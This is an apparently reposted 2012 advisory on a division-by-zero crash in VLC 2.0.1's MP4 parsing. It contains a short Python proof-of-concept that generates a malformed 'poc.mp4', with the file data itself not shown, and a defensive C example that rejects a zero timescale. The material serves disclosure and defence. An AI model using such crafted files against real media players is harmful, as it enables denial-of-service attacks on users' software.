
VLC 2.0.1 Division By Zero

Posted on 20 April 2012

###########################################################################################################
Application : VLC 2.0.1 division by zero vulnerability
Versions    : 2.0.1
Date        : 19/04/2012
Author      : Senator of Pirates
E-Mail      : Senator.of.Pirates.team@gmail.com
FaceBook    : /SenatorofPiratesInfo
###########################################################################################################

Bug :
----
Division-by-zero vulnerability in the handling of MP4 files. Some values are read from the file and used in a division; because those values are under the attacker's control, modifying a few bytes is enough to cause a crash.

PoC :
-----
Data = "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
avi = open('poc.mp4', 'wb+')
avi.write(Data)
avi.close()
print "[-] MP4 file generated"
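The defensive side of the bug class described above, as an added example (not code from VLC or from the advisory's author): a parser that validates a file-supplied divisor before dividing. The advisory does not say which MP4 field is involved; the version-0 `mdhd` box layout, the function names `be32` and `mdhd_duration_ms`, and the sample payloads are assumptions chosen for illustration.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Read a big-endian 32-bit value, as ISO BMFF (MP4) stores integers. */
static uint32_t be32(const uint8_t *p) {
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8)  |  (uint32_t)p[3];
}

/* Hypothetical helper: parse the payload of a version-0 'mdhd' box
 * (version/flags, creation, modification, timescale, duration) and
 * compute the duration in milliseconds.
 * Returns 0 on success, -1 if the payload is truncated, uses an
 * unsupported version, or carries a zero timescale. */
int mdhd_duration_ms(const uint8_t *payload, size_t len, uint64_t *out_ms) {
    if (payload == NULL || out_ms == NULL || len < 20)
        return -1;                      /* not enough bytes to read fields */
    if (payload[0] != 0)
        return -1;                      /* only the version-0 layout here */
    uint32_t timescale = be32(payload + 12);
    uint32_t duration  = be32(payload + 16);
    if (timescale == 0)
        return -1;                      /* file-controlled divisor: reject */
    /* Widen before multiplying so duration * 1000 cannot overflow. */
    *out_ms = ((uint64_t)duration * 1000u) / timescale;
    return 0;
}

/* Constructed sample payloads (not taken from any real file). */
static const uint8_t sample_ok[20] = {
    0,0,0,0,  0,0,0,0,  0,0,0,0,
    0x00,0x00,0x03,0xE8,                /* timescale = 1000 */
    0x00,0x00,0x13,0x88                 /* duration  = 5000 */
};
static const uint8_t sample_zero[20] = {
    0,0,0,0,  0,0,0,0,  0,0,0,0,
    0x00,0x00,0x00,0x00,                /* timescale = 0 */
    0x00,0x00,0x13,0x88
};

int main(void) {
    uint64_t ms = 0;
    int rc = mdhd_duration_ms(sample_ok, sizeof sample_ok, &ms);
    printf("valid header: rc=%d ms=%llu\n", rc, (unsigned long long)ms);
    rc = mdhd_duration_ms(sample_zero, sizeof sample_zero, &ms);
    printf("zero timescale: rc=%d (rejected, no division performed)\n", rc);
    return 0;
}
```

The same check applies to every divisor or modulus operand derived from file contents, not only to this one field.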

 
